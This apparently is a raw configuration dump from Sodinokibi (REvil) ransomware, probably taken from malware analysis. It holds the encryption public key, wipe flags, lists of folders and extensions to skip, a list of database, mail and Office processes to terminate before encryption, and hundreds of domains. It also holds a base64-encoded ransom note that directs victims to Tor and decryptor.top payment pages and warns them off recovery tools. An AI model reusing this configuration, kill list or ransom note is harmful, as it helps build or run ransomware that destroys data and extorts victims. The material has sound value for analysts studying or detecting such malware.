.ru;kosten-vochtbestrijding.be;voice2biz.com;geoweb.software;lattalvor.com;mac-computer-support-hamburg.de;scietech.academy;rechtenplicht.be;qrs-international.com;nexstagefinancial.com;tesisatonarim.com;bumbipdeco.site;harleystreetspineclinic.com;latableacrepes-meaux.fr;publicompserver.de;billyoart.com;mrkluttz.com;ikzoekgod.be;onlinetvgroup.com;haus-landliebe.de;silkeight.com;curtsdiscountguns.com;premier-iowa.com;furland.ru;campinglaforetdetesse.com;yayasanprimaunggul.org;bavovrienden.nl;sellthewrightway.com;tramadolhealth.com;elliemaccreative.wordpress.com;rino-gmbh.com;imaginekithomes.co.nz;linearete.com;zaczytana.com;cainlaw-okc.com;cxcompany.com;myplaywin3.com;condormobile.fr;annida.it;sytzedevries.com;bagaholics.in;jmmartinezilustrador.com;fbmagazine.ru;ramirezprono.com;kompresory-opravy.com;ketomealprep.academy;kenmccallum.com;block-optic.com;vitormmcosta.com;breakluckrecords.com;lovetzuchia.com;campusescalade.com;janellrardon.com;rarefoods.ro;ziliak.com;egpu.fr;latteswithleslie.com;utilisacteur.fr;smartmind.net;fysiotherapierijnmond.nl;penumbuhrambutkeiskei.com;topvijesti.net;lyricalduniya.com;k-v-f.de;ravage-webzine.nl;baumfinancialservices.com;tanatek.com;muni.pe;mike.matthies.de;rvside.com;hvitfeldt.dk;hartofurniture.com;wg-heiligenstadt.de;der-stempelking.de;andreaskildegaard.dk;collegetennis.info;dierenambulancealkmaar.nl;centuryvisionglobal.com;mgimalta.com;valiant-voice.com;burg-zelem.de;strauchs-wanderlust.info;pureelements.nl;apmollerpension.com;n-newmedia.de;amyandzac.com;animalfood-online.de;cuadc.org;uci-france.fr;istantidigitali.com;teethinadaydentalimplants.com;nationnewsroom.com;otpusk.zp.ua;galaniuklaw.com;hekecrm.com;sbit.ag;spirello.nl;perceptdecor.com;hnkns.com;zuerich-umzug.ch;renderbox.ch;bcmets.info;hospitalitytrainingsolutions.co.uk;mindsparkescape.com;xn--80abehgab4ak0ddz.xn--p1ai;devplus.be;lollachiro.com;olry-cloisons.fr;line-x.co.uk;alpesiberie.com;reputation-medical.online;grafikstudio-visuell.de;watchsale.biz;k-zubki.ru;rokthetalk.com;jefersonalessandro.com;wyreforest.net;sber-biznes.com;haard-totaal.nl;christopherhannan.com;lidkopingsnytt.nu;aceroprime.com;mbuildinghomes.com;cotton-avenue.co.il;skolaprome.eu;framemyballs.com;catering.com;wirmuessenreden.com;blavait.fr;mayprogulka.ru;andrealuchesi.it;diverfiestas.com.es;die-immo-agentur.de;stoneridgemontessori.com;moira-cristescu.com;humanviruses.org;littlesaints.academy;neolaiamedispa.com;placermonticello.com;cp-bap.de;selected-minds.de;coachpreneuracademy.com;aslog.fr;mahikuchen.com;magnetvisual.com;vipcarrental.ae;mundo-pieces-auto.fr;belinda.af;nepressurecleaning.com;fridakids.com;goodboyscustom.com;protoplay.ca;janmorgenstern.com;yuanshenghotel.com;askstaffing.com;wallflowersandrakes.com;creohn.de;apogeeconseils.fr;fskhjalmar.se;leopoldineroux.com;pinthelook.com;xn--ziinoapte-6ld.ro;zwemofficial.nl;redctei.co;sambaglow.com;topautoinsurers.net;tatyanakopieva.ru;bonitabeachassociation.com;brinkdoepke.eu;so-sage.fr;hutchstyle.co.uk;ncjc.ca;tzn.nu;concontactodirecto.com;aoyama.ac;xtensifi.com;ruggestar.ch;slotspinner.com;breathebettertolivebetter.com;dibli.store;ebible.co;gratiocafeblog.wordpress.com;thiagoperez.com;pilotgreen.com;kausette.com;aberdeenartwalk.org;ownidentity.com;spacebel.be;pazarspor.org.tr;factorywizuk.com;professionetata.com;groovedealers.ru;agora-collectivites.com;rs-danmark.dk;poems-for-the-soul.ch;craftron.com;eatyoveges.com;jakubrybak.com;craftingalegacy.com;aheadloftladders.co.uk;oththukaruva.com;nutriwell.com.sg;energosbit-rp.ru;oraweb.net;mariamalmahdi.com;thegetawaycollective.com;charlottelhanna.com;markseymourphotography.co.uk;leatherjees.com;happylublog.wordpress.com;bulyginnikitav.000webhostapp.com;fidelitytitleoregon.com;osn.ro;studionumerik.fr;cops4causes.org;phukienbepthanhdat.com;beandrivingschool.com.au;chatterchatterchatter.com;bluelakevision.com;mustangmarketinggroup.com;rentingwell.com;biodentify.ai;texanscan.org;landgoedspica.nl;digitale-elite.de;stagefxinc.com;physio-lang.de;jollity.hu;liverpoolabudhabi.ae;logosindustries.com;citydogslife.com;metriplica.academy;a-zpaperwork.eu;andermattswisswatches.ch;jandhpest.com;greenrider.nl;brighthillgroup.com;fotoslubna.com;yvesdoin-aquarelles.fr;mariannelemenestrel.com;airvapourbarrier.com;reizenmetkinderen.be;clinic-beethovenstrasse-ag.ch;rapid5kloan.org;mazift.dk;rolleepollee.com;denhaagfoodie.nl;lesyeuxbleus.net;khtrx.com;richardkershawwines.co.za;rishigangoly.com;apiarista.de;goeppinger-teppichreinigung.de;dreamvoiceclub.org;metcalfe.ca;sycamoregreenapts.com;alharsunindo.com;legundschiess.de;thisprettyhair.com;parentsandkids.com;edrickennedymacfoy.com;elex.is;encounter-p.net;thepixelfairy.com;mediogiro.com.ar;limounie.com;birthplacemag.com;alnectus.com;billigeflybilletter.dk;fi-institutionalfunds.com;distrifresh.com;luvinsburger.fr;kamin-somnium.de;glennverschueren.be;elitkeramika-shop.com.ua;saboboxtel.uk;innersurrection.com;alisodentalcare.com;galatee-couture.com;ciga-france.fr;hostingbangladesh.net;domaine-des-pothiers.com;hostastay.com;ox-home.com;skidpiping.de;shrinkingplanet.com;michal-s.co.il;basindentistry.com;baptistdistinctives.org;premiumweb.com.ua:443;letterscan.de;levencovka.ru;fsbforsale.com;imagine-entertainment.com;medicalsupportco.com;explora.nl;lisa-poncon.fr;louiedager.com;johnstonmingmanning.com;narca.net;kuriero.pro;peninggibadan.co.id;craftstone.co.nz;kiraribeaute-nani.com;eyedoctordallas.com;laylavalentine.com;newonestop.com;guohedd.com;thehovecounsellingpractice.co.uk;epsondriversforwindows.com;mamajenedesigns.com;acumenconsultingcompany.com;animation-pro.co.uk;avis.mantova.it;babysitting-hk.helpergo.co;worldproskitour.com;morgansconsult.com;hypogenforensic.com;alabamaroofingllc.com;arabianmice.com;cap29010.it;bringmehope.org;signamedia.de;riffenmattgarage.ch;opt4cdi.com;aciscomputers.com;pubcon.com;agencewho-aixenprovence.fr;promus.ca;dentallabor-luenen.de;schulz-moelln.de;jimprattmediations.com;mesajjongeren.nl;bajova.sk;spartamovers.com;martha-frets-ceramics.nl;epicjapanart.com;go.labibini.ch;raeoflightmusic.com;pankiss.ru;bruut.online;encounter-p.net;photonag.com;nourella.com;licensed-public-adjuster.com;boomerslivinglively.com;autoteamlast.de;leloupblanc.gr;adterium.com;ronielyn.com;devus.de;9nar.com;bakingismyyoga.com;cymru.futbol;randyabrown.com;biketruck.de;ivancacu.com;geitoniatonaggelon.gr;mikegoodfellow.co.uk;sarahspics.co.uk;belofloripa.be;neonodi.be;ocduiblog.com;santastoy.store;cssp-mediation.org;smartworkplaza.com;katherinealy.com;ludoil.it;jdscenter.com;sharonalbrightdds.com;fire-space.com;saberconcrete.com;letsstopsmoking.co.uk;whoopingcrane.com;ruggestar.ch;iactechnologies.net;5thactors.com;internestdigital.com;glas-kuck.de;jeanmonti.com;ziliak.com;golfclublandgoednieuwkerk.nl;nauticmarine.dk;fluzfluzrewards.com;t3brothers.com;jobstomoveamerica.org;forskolinslimeffect.net;nuohous.com;anleggsregisteret.no;dcc-eu.com;keuken-prijs.nl;opticahubertruiz.com;brownswoodblog.com;fta-media.com;pro-gamer.pl;ced-elec.com;mindfuelers.com;endstarvation.com;tastevirginia.com;stabilisateur.fr;b3b.ch;triplettagaite.fr;factoriareloj.com;global-migrate.com;ronaldhendriks.nl;jonnyhooley.com;soundseeing.net;yournextshoes.com;kickittickets.com;dantreranch.com;scotlandsroute66.co.uk;oportowebdesign.com;motocrosshideout.com;aquacheck.co.za;theater-lueneburg.de;adaduga.info;production-stills.co.uk;rossomattonecase.it;kryddersnapsen.dk;linkbuilding.life;gosouldeep.com;denverwynkoopdentist.com;verbouwingsdouche.nl;lapponiasafaris.com;tutvracks.com;agriturismocastagneto.it;rozmata.com;paprikapod.com;lmmont.sk;makingmillionaires.net;acornishstudio.co.uk;corporacionrr.com;orchardbrickwork.com;from02pro.com;cookinn.nl;the-cupboard.co.uk;interlinkone.com;liepertgrafikweb.at;simpleitsolutions.ch;campusce.com;gurutechnologies.net;tellthebell.website;uncensoredhentaigif.com;nepal-pictures.com;rtc24.com;oro.ae;initconf.com;zinnystar.com;ledyoucan.com;slideevents.be;anchelor.com;pharmeko-group.com;citiscapes-art.com;dayenne-styling.nl;tbalp.co.uk;nxtstg.org;astrographic.com;nieuwsindeklas.be;pisofare.co;advancedeyecare.com;pajagus.fr;mediahub.co.nz;donau-guides.eu;g2mediainc.com;sprintcoach.com;dinedrinkdetroit.com;radishallgood.com;palmenhaus-erfurt.de;jlgraphisme.fr;lassocrm.com;netadultere.fr;mrmac.com;renehartman.nl;graygreenbiomedservices.com;berdonllp.com;globalcompliancenews.com;sololibrerie.it;auberives-sur-vareze.fr;eastgrinsteadwingchun.com;livelai.com;napisat-pismo-gubernatoru.ru:443;fitnessblenderstory.com;expohomes.com;mjk.digital;2020hindsight.info;cyberpromote.de;hensleymarketing.com;innovationgames-brabant.nl;artcase.pl;stathmoulis.gr;mediabolmong.com;kellengatton.com;ncn.nl;3daywebs.com;cleanroomequipment.ie;nalliasmali.net;advesa.com;buzzneakers.com;handyman-silkeborg.dk;billscars.net;catalyseurdetransformation.com;espaciopolitica.com;gatlinburgcottage.com;ninjaki.com;delegationhub.com;nrgvalue.com;focuskontur.com;nykfdyrehospital.dk;skyboundnutrition.co.uk;asiaartgallery.jp;wrinstitute.org;itheroes.dk;jalkapuu.net;amco.net.au;phoenixcrane.com;csaballoons.com;smartercashsystem.com;dentalcircle.com;trainiumacademy.com;operativadigital.com;tages-geldvergleich.de;blueridgeheritage.com;polynine.com;kristianboennelykke.dk;eafx.pro;victorvictoria.com;noda.com.ua;awaisghauri.com;bendel-partner.de;pixelhealth.net;janasfokus.com;goodherbalhealth.com;universelle.fr;eshop.design;endlessrealms.net;brisbaneosteopathic.com.au;secrets-clubs.co.uk;stressreliefadvice.com;sealgrinderpt.com;jag.me;suonenjoen.fi;mrcar.nl;antesacademy.it;mind2muscle.nl;1deals.com;ayudaespiritualtamara.com;alcye.com;advance-refle.com;profibersan.com;tetameble.pl;broccolisoep.nl;direitapernambuco.com;kerstliedjeszingen.nl;cardsandloyalty.com;sshomme.com;p-ride.live;ideamode.com;ygallerysalonsoho.com:443;fazagostar.co;scholarquotes.com;claudiakilian.de;karmeliterviertel.com;patriotcleaning.net;bescomedical.de;mercadodelrio.com", "net": true, "nbody": "LQAtAC0APQA9AD0AIABXAGUAbABjAG8AbQBlAC4AIABBAGcAYQBpAG4ALgAgAD0APQA9AC0ALQAtAA0ACgANAAoAWwArAF0AIABXAGgAYQB0AHMAIABIAGEAcABwAGUAbgA/ACAAWwArAF0ADQAKAA0ACgBZAG8AdQByACAAZgBpAGwAZQBzACAAYQByAGUAIABlAG4AYwByAHkAcAB0AGUAZAAsACAAYQBuAGQAIABjAHUAcgByAGUAbgB0AGwAeQAgAHUAbgBhAHYAYQBpAGwAYQBiAGwAZQAuACAAWQBvAHUAIABjAGEAbgAgAGMAaABlAGMAawAgAGkAdAA6ACAAYQBsAGwAIABmAGkAbABlAHMAIABvAG4AIAB5AG8AdQAgAGMAbwBtAHAAdQB0AGUAcgAgAGgAYQBzACAAZQB4AHAAYQBuAHMAaQBvAG4AIAB7AEUAWABUAH0ALgANAAoAQgB5ACAAdABoAGUAIAB3AGEAeQAsACAAZQB2AGUAcgB5AHQAaABpAG4AZwAgAGkAcwAgAHAAbwBzAHMAaQBiAGwAZQAgAHQAbwAgAHIAZQBjAG8AdgBlAHIAIAAoAHIAZQBzAHQAbwByAGUAKQAsACAAYgB1AHQAIAB5AG8AdQAgAG4AZQBlAGQAIAB0AG8AIABmAG8AbABsAG8AdwAgAG8AdQByACAAaQBuAHMAdAByAHUAYwB0AGkAbwBuAHMALgAgAE8AdABoAGUAcgB3AGkAcwBlACwAIAB5AG8AdQAgAGMAYQBuAHQAIAByAGUAdAB1AHIAbgAgAHkAbwB1AHIAIABkAGEAdABhACAAKABOAEUAVgBFAFIAKQAuAA0ACgANAAoAWwArAF0AIABXAGgAYQB0ACAAZwB1AGEAcgBhAG4AdABlAGUAcwA/ACAAWwArAF0ADQAKAA0ACgBJAHQAcwAgAGoAdQBzAHQAIABhACAAYgB1AHMAaQBuAGUAcwBzAC4AIABXAGUAIABhAGIAcwBvAGwAdQB0AGUAbAB5ACAAZABvACAAbgBvAHQAIABjAGEAcgBlACAAYQBiAG8AdQB0ACAAeQBvAHUAIABhAG4AZAAgAHkAbwB1AHIAIABkAGUAYQBsAHMALAAgAGUAeABjAGUAcAB0ACAAZwBlAHQAdABpAG4AZwAgAGIAZQBuAGUAZgBpAHQAcwAuACAASQBmACAAdwBlACAAZABvACAAbgBvAHQAIABkAG8AIABvAHUAcgAgAHcAbwByAGsAIABhAG4AZAAgAGwAaQBhAGIAaQBsAGkAdABpAGUAcwAgAC0AIABuAG8AYgBvAGQAeQAgAHcAaQBsAGwAIABuAG8AdAAgAGMAbwBvAHAAZQByAGEAdABlACAAdwBpAHQAaAAgAHUAcwAuACAASQB0AHMAIABuAG8AdAAgAGkAbgAgAG8AdQByACAAaQBuAHQAZQByAGUAcwB0AHMALgANAAoAVABvACAAYwBoAGUAYwBrACAAdABoAGUAIABhAGIAaQBsAGkAdAB5ACAAbwBmACAAcgBlAHQAdQByAG4AaQBuAGcAIABmAGkAbABlAHMALAAgAFkAbwB1ACAAcwBoAG8AdQBsAGQAIABnAG8AIAB0AG8AIABvAHUAcgAgAHcAZQBiAHMAaQB0AGUALgAgAFQAaABlAHIAZQAgAHkAbwB1ACAAYwBhAG4AIABkAGUAYwByAHkAcAB0ACAAbwBuAGUAIABmAGkAbABlACAAZgBvAHIAIABmAHIAZQBlAC4AIABUAGgAYQB0ACAAaQBzACAAbwB1AHIAIABnAHUAYQByAGEAbgB0AGUAZQAuAA0ACgBJAGYAIAB5AG8AdQAgAHcAaQBsAGwAIABuAG8AdAAgAGMAbwBvAHAAZQByAGEAdABlACAAdwBpAHQAaAAgAG8AdQByACAAcwBlAHIAdgBpAGMAZQAgAC0AIABmAG8AcgAgAHUAcwAsACAAaQB0AHMAIABkAG8AZQBzACAAbgBvAHQAIABtAGEAdAB0AGUAcgAuACAAQgB1AHQAIAB5AG8AdQAgAHcAaQBsAGwAIABsAG8AcwBlACAAeQBvAHUAcgAgAHQAaQBtAGUAIABhAG4AZAAgAGQAYQB0AGEALAAgAGMAYQB1AHMAZQAgAGoAdQBzAHQAIAB3AGUAIABoAGEAdgBlACAAdABoAGUAIABwAHIAaQB2AGEAdABlACAAawBlAHkALgAgAEkAbgAgAHAAcgBhAGMAdABpAHMAZQAgAC0AIAB0AGkAbQBlACAAaQBzACAAbQB1AGMAaAAgAG0AbwByAGUAIAB2AGEAbAB1AGEAYgBsAGUAIAB0AGgAYQBuACAAbQBvAG4AZQB5AC4ADQAKAA0ACgBbACsAXQAgAEgAbwB3ACAAdABvACAAZwBlAHQAIABhAGMAYwBlAHMAcwAgAG8AbgAgAHcAZQBiAHMAaQB0AGUAPwAgAFsAKwBdAA0ACgANAAoAWQBvAHUAIABoAGEAdgBlACAAdAB3AG8AIAB3AGEAeQBzADoADQAKAA0ACgAxACkAIABbAFIAZQBjAG8AbQBtAGUAbgBkAGUAZABdACAAVQBzAGkAbgBnACAAYQAgAFQATwBSACAAYgByAG8AdwBzAGUAcgAhAA0ACgAgACAAYQApACAARABvAHcAbgBsAG8AYQBkACAAYQBuAGQAIABpAG4AcwB0AGEAbABsACAAVABPAFIAIABiAHIAbwB3AHMAZQByACAAZgByAG8AbQAgAHQAaABpAHMAIABzAGkAdABlADoAIABoAHQAdABwAHMAOgAvAC8AdABvAHIAcAByAG8AagBlAGMAdAAuAG8AcgBnAC8ADQAKACAAIABiACkAIABPAHAAZQBuACAAbwB1AHIAIAB3AGUAYgBzAGkAdABlADoAIABoAHQAdABwADoALwAvAGEAcABsAGUAYgB6AHUANAA3AHcAZwBhAHoAYQBwAGQAcQBrAHMANgB2AHIAYwB2ADYAegBjAG4AagBwAHAAawBiAHgAYgByADYAdwBrAGUAdABmADUANgBuAGYANgBhAHEAMgBuAG0AeQBvAHkAZAAuAG8AbgBpAG8AbgAvAHsAVQBJAEQAfQANAAoADQAKADIAKQAgAEkAZgAgAFQATwBSACAAYgBsAG8AYwBrAGUAZAAgAGkAbgAgAHkAbwB1AHIAIABjAG8AdQBuAHQAcgB5ACwAIAB0AHIAeQAgAHQAbwAgAHUAcwBlACAAVgBQAE4AIQAgAEIAdQB0ACAAeQBvAHUAIABjAGEAbgAgAHUAcwBlACAAbwB1AHIAIABzAGUAYwBvAG4AZABhAHIAeQAgAHcAZQBiAHMAaQB0AGUALgAgAEYAbwByACAAdABoAGkAcwA6AA0ACgAgACAAYQApACAATwBwAGUAbgAgAHkAbwB1AHIAIABhAG4AeQAgAGIAcgBvAHcAcwBlAHIAIAAoAEMAaAByAG8AbQBlACwAIABGAGkAcgBlAGYAbwB4ACwAIABPAHAAZQByAGEALAAgAEkARQAsACAARQBkAGcAZQApAA0ACgAgACAAYgApACAATwBwAGUAbgAgAG8AdQByACAAcwBlAGMAbwBuAGQAYQByAHkAIAB3AGUAYgBzAGkAdABlADoAIABoAHQAdABwADoALwAvAGQAZQBjAHIAeQBwAHQAbwByAC4AdABvAHAALwB7AFUASQBEAH0ADQAKAA0ACgBXAGEAcgBuAGkAbgBnADoAIABzAGUAYwBvAG4AZABhAHIAeQAgAHcAZQBiAHMAaQB0AGUAIABjAGEAbgAgAGIAZQAgAGIAbABvAGMAawBlAGQALAAgAHQAaABhAHQAcwAgAHcAaAB5ACAAZgBpAHIAcwB0ACAAdgBhAHIAaQBhAG4AdAAgAG0AdQBjAGgAIABiAGUAdAB0AGUAcgAgAGEAbgBkACAAbQBvAHIAZQAgAGEAdgBhAGkAbABhAGIAbABlAC4ADQAKAA0ACgBXAGgAZQBuACAAeQBvAHUAIABvAHAAZQBuACAAbwB1AHIAIAB3AGUAYgBzAGkAdABlACwAIABwAHUAdAAgAHQAaABlACAAZgBvAGwAbABvAHcAaQBuAGcAIABkAGEAdABhACAAaQBuACAAdABoAGUAIABpAG4AcAB1AHQAIABmAG8AcgBtADoADQAKAEsAZQB5ADoADQAKAA0ACgB7AEsARQBZAH0ADQAKAA0ACgANAAoARQB4AHQAZQBuAHMAaQBvAG4AIABuAGEAbQBlADoADQAKAA0ACgB7AEUAWABUAH0ADQAKAA0ACgAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ADQAKAA0ACgAhACEAIQAgAEQAQQBOAEcARQBSACAAIQAhACEADQAKAEQATwBOAFQAIAB0AHIAeQAgAHQAbwAgAGMAaABhAG4AZwBlACAAZgBpAGwAZQBzACAAYgB5ACAAeQBvAHUAcgBzAGUAbABmACwAIABEAE8ATgBUACAAdQBzAGUAIABhAG4AeQAgAHQAaABpAHIAZAAgAHAAYQByAHQAeQAgAHMAbwBmAHQAdwBhAHIAZQAgAGYAbwByACAAcgBlAHMAdABvAHIAaQBuAGcAIAB5AG8AdQByACAAZABhAHQAYQAgAG8AcgAgAGEAbgB0AGkAdgBpAHIAdQBzACAAcwBvAGwAdQB0AGkAbwBuAHMAIAAtACAAaQB0AHMAIABtAGEAeQAgAGUAbgB0AGEAaQBsACAAZABhAG0AZwBlACAAbwBmACAAdABoAGUAIABwAHIAaQB2AGEAdABlACAAawBlAHkAIABhAG4AZAAsACAAYQBzACAAcgBlAHMAdQBsAHQALAAgAFQAaABlACAATABvAHMAcwAgAGEAbABsACAAZABhAHQAYQAuAA0ACgAhACEAIQAgACEAIQAhACAAIQAhACEADQAKAE8ATgBFACAATQBPAFIARQAgAFQASQBNAEUAOgAgAEkAdABzACAAaQBuACAAeQBvAHUAcgAgAGkAbgB0AGUAcgBlAHMAdABzACAAdABvACAAZwBlAHQAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYgBhAGMAawAuACAARgByAG8AbQAgAG8AdQByACAAcwBpAGQAZQAsACAAdwBlACAAKAB0AGgAZQAgAGIAZQBzAHQAIABzAHAAZQBjAGkAYQBsAGkAcwB0AHMAKQAgAG0AYQBrAGUAIABlAHYAZQByAHkAdABoAGkAbgBnACAAZgBvAHIAIAByAGUAcwB0AG8AcgBpAG4AZwAsACAAYgB1AHQAIABwAGwAZQBhAHMAZQAgAHMAaABvAHUAbABkACAAbgBvAHQAIABpAG4AdABlAHIAZgBlAHIAZQAuAA0ACgAhACEAIQAgACEAIQAhACAAIQAhACEAAAA=", "nname": "{EXT}-readme.txt", "exp": true, "img": "QQBsAGwAIABvAGYAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYQByAGUAIABlAG4AYwByAHkAcAB0AGUAZAAhAA0ACgANAAoARgBpAG4AZAAgAHsARQBYAFQAfQAtAHIAZQBhAGQAbQBlAC4AdAB4AHQAIABhAG4AZAAgAGYAbwBsAGwAbwB3ACAAaQBuAHMAdAB1AGMAdABpAG8AbgBzAAAA"}

Threatname: Sodinokibi

{"pk": "jD6pLfwUHlEoWBKadlZ4A78CLm8I0UKlzdzW7XautWE=", "pid": "33", "sub": "357", "dbg": false, "fast": true, "wipe": true, "wht": {"fld": ["application data", "tor browser", "windows.old", "appdata", "$windows.~bt", "intel", "perflogs", "program files", "programdata", "boot", "msocache", "program files (x86)", "system volume information", "$windows.~ws", "windows", "mozilla", "google", "$recycle.bin"], "fls": ["desktop.ini", "ntuser.dat", "bootfont.bin", "ntldr", "autorun.inf", "ntuser.ini", "ntuser.dat.log", "bootsect.bak", "thumbs.db", "iconcache.db", "boot.ini"], "ext": ["idx", "hta", "icns", "cmd", "wpx", "msp", "msu", "cab", "diagpkg", "spl", "scr", "dll", "themepack", "bin", "prf", "msc", "nls", "msi", "ps1", "mod", "exe", "bat", "adv", "386", "ico", "theme", "ani", "sys", "diagcab", "deskthemepack", "msstyles", "lock", "diagcfg", "ocx", "hlp", "com", "ics", "lnk", "drv", "shs", "rom", "cur", "rtp", "cpl", "key", "icl", "ldf", "nomedia", "mpa"]}, "wfld": ["backup"], "prc": ["thunderbird.exe", "synctime.exe", "dbsnmp.exe", "encsvc.exe", "isqlplussvc.exe", "ocautoupds.exe", "mydesktopqos.exe", "powerpnt.exe", "mysqld.exe", "mydesktopservice.exe", "outlook.exe", "mysqld_nt.exe", "firefoxconfig.exe", "sqbcoreservice.exe", "steam.exe", "sqlbrowser.exe", "infopath.exe", "thebat.exe", "msaccess.exe", "mysqld_opt.exe", "tbirdconfig.exe", "visio.exe", "msftesql.exe", "excel.exe", "oracle.exe", "mspub.exe", "sqlservr.exe", "agntsvc.exe", "onenote.exe", "winword.exe", "thebat64.exe", "dbeng50.exe", "wordpad.exe", "ocssd.exe", "sqlwriter.exe", "ocomm.exe", "sqlagent.exe", "xfssvccon.exe"], "dmn": "parksideseniorliving.net;90nguyentuan.com;enactusnhlstenden.com;avisioninthedesert.com;lashandbrowenvy.com;satoblog.org;rsidesigns.com;pansionatblago.ru;magrinya.net;baikalflot.ru;bd2fly.com;business-basic.de;afbudsrejserallinclusive.dk;m2graph.fr;stanleyqualitysystems.com;altitudeboise.com;lexced.com;chainofhopeeurope.eu;bayshoreelite.com;mursall.de;amelielecompte.wordpress.com;wribrazil.com;testitjavertailut.net;chomiksy.net;vitoriaecoturismo.com.br;georgemuncey.com;funworx.de;nbva.co.uk;c-sprop.com;relevantonline.eu;abulanov.com;maxcube24.com.ua;kenmccallum.com;stage-infirmier.fr;skoczynski.eu;mieleshopping.it;holocine.de;oscommunity.de;ikadomus.com;bundan.com;davedavisphotos.com;activeterroristwarningcompany.com;hostaletdelsindians.es;almamidwifery.com;innervisions-id.com;gazelle-du-web.com;angelsmirrorus.com;efficiencyconsulting.es;vedsegaard.dk;schroederschoembs.com;welovecustomers.fr;11.in.ua;modamarfil.com;look.academy;rhino-storage.co.uk;solutionshosting.co.uk;vdolg24.online;azerbaycanas.com;racefietsenblog.nl;photographycreativity.co.uk;crestgood.com;voetbalhoogeveen.nl;suitesartemis.gr;bodymindchallenger.com;test-teleachat.fr;sjtpo.org;patassociation.com;iron-mine.ru;deduktia.fi;ntinasfiloxenia.gr;banukumbak.com;forextimes.ru;rattanwarehouse.co.uk;mslp.org;wineandgo.hu;happycatering.de;dogsunlimitedguide.com;rubyaudiology.com;bridalcave.com;loparnille.se;fotoeditores.com;dentourage.com;loysonbryan.com;perfectgrin.com;eurethicsport.eu;fann.ru;gavelmasters.com;advanced-removals.co.uk;bluemarinefoundation.com;frankgoll.com;hotjapaneselesbian.com;affligemsehondenschool.be;directique.com;cascinarosa33.it;maryairbnb.wordpress.com;ijsselbeton.nl;ahgarage.com;johnkoen.com;frameshift.it;fascaonline.com;ilveshistoria.com;akwaba-safaris.com;teutoradio.de;therapybusinessacademy.com;natturestaurante.com.br;metallbau-hartmann.eu;vvego.com;airserviceunlimited.com;pedmanson.com;profiz.com;sveneulberg.de;triavlete.com;altocontatto.net;allinonecampaign.com;docarefoundation.org;banksrl.co.za;metroton.ru;kafkacare.com;rentsportsequip.com;zealcon.ae;floweringsun.org;benchbiz.com;carmel-york.com;jacquesgarcianoto.com;artvark.nl;marcandy.com;mondolandscapes.com;greeneyetattoo.com;the5thquestion.com;angelika-schwarz.com;gta-jjb.fr;the3-week-diet.net;wordpress.idium.no;rename.kz;rhino-turf.com;pxsrl.it;flossmoordental.com;dieetuniversiteit.nl;keyboardjournal.com;richardiv.com;grupoexin10.com;margaretmcshane.com;pourlabretagne.bzh;outstandingminialbums.com;slotenmakerszwijndrecht.nl;bratek-immobilien.de;paradigmlandscape.com;motocrossplace.co.uk;subyard.com;palmecophilippines.com;ultimatelifesource.com;zdrowieszczecin.pl;auto-opel.ro;skinkeeper.li;reygroup.pt;putzen-reinigen.com;johnsonweekly.com;boyfriendsgoal.site;leadforensics.com;circuit-diagramz.com;terraflair.de;pvandambv.nl;matthieupetel.fr;biblica.com;bilius.dk;fla.se;jax-interim-and-projectmanagement.com;julielusktherapy.com;specialtyhomeservicesllc.com;skyscanner.ro;betterce.com;lifeinbreaths.com;grancanariaregional.com;iexpert99.com;toranjtuition.org;xrresources.com;justaroundthecornerpetsit.com;alltagsrassismus-entknoten.de;oexebusiness.com;site.markkit.com.br;bookingwheel.com;miscbo.it;invela.dk;peppergreenfarmcatering.com.au;insane.agency;thestudio.academy;jlwilsonbooks.com;ykobbqchicken.ca;colored-shelves.com;carsten.sparen-it.de;tieronechic.com;trivselsguide.dk;nicksrock.com;lunoluno.com;smartspeak.com;stringnosis.academy;greatofficespaces.net;descargandoprogramas.com;prometeyagro.com.ua;globalskills.pt;levelseven.be;bubbalucious.com;hiddensee-buhne11.de;primemarineengineering.com;theintellect.edu.pk;goddardleadership.org;lsngroupe.com;akcadagofis.com;chris-anne.com;azloans.com;zorgboerderijravensbosch.nl;cormanmarketing.com;axisoflove.org:443;marmarabasin.com;xn--80addfr4ahr.dp.ua;hameghlim.com;webforsites.com;successcolony.com.ng;arazi.eus;alexwenzel.de;hotelturbo.de;triplettabordeaux.fr;datatri.be;easydental.ae;kdbrh.com;wademurray.com;pinkxgayvideoawards.com;hoteltantra.com;drbrianhweeks.com;duthler.nl;supercarhire.co.uk;frimec-international.es;quitescorting.com;unboxtherapy.site;leansupremegarcinia.net;adedesign.com;richardmaybury.co.uk;agenceassemble.fr;four-ways.com;o90.dk;druktemakersheerenveen.nl;yourcosmicbeing.com;catchup-mag.com;adabible.org;traitware.com;drnelsonpediatrics.com;subquercy.fr;leijstrom.com;aktivfriskcenter.se;avtoboss163.ru:443;chatberlin.de;dinecorp.com;prodentalblue.com;atelierkomon.com;malevannye.ru;bourchier.org;acibademmobil.com.tr;min-virksomhed.dk;purepreprod4.com;hinotruckwreckers.com.au;alattekniksipil.com;redpebblephotography.com;piestar.com;salonlamar.nl;lumturo.academy;stitch-n-bitch.com;molinum.pt;ilovefullcircle.com;brunoimmobilier.com;indiebizadvocates.org;innovationgames-brabant.nl;pays-saint-flour.fr;foerderverein-vatterschule.de;queertube.net;drbenveniste.com;gaearoyals.com;shortysspices.com;beauty-traveller.com;livedeveloper.com;eksperdanismanlik.com;futurenetworking.com;customroasts.com;cmascd.com;muller.nl;michaelfiegel.com;tecleados.com;dennisverschuur.com;dmlcpa.com;saint-malo-developpement.fr;designimage.ae;manzel.tn;myfbateam.com;sochi-okna23.ru;cl0nazepamblog.com;signededenroth.dk;kartuindonesia.com;xn--billigafrgpatroner-stb.se;proffteplo.com;o2o-academy.com;soncini.ch;gsconcretecoatings.com;the-beauty-guides.com;jobscore.com;omnicademy.com;bg.szczecin.pl;111firstdelray.com;naukaip.ru;log-barn.co.uk;tilldeeke.de;optigas.com;husetsanitas.dk;kroophold-sjaelland.dk;matteoruzzaofficial.com;mollymccarthydesign.com;mangimirossana.it;onlinemarketingsurgery.co.uk;onesynergyinternational.com;deziplan.ru;buonabitare.com;spectamarketingdigital.com.br;annenymus.com;luvbec.com;glende-pflanzenparadies.de;tchernia-conseil.f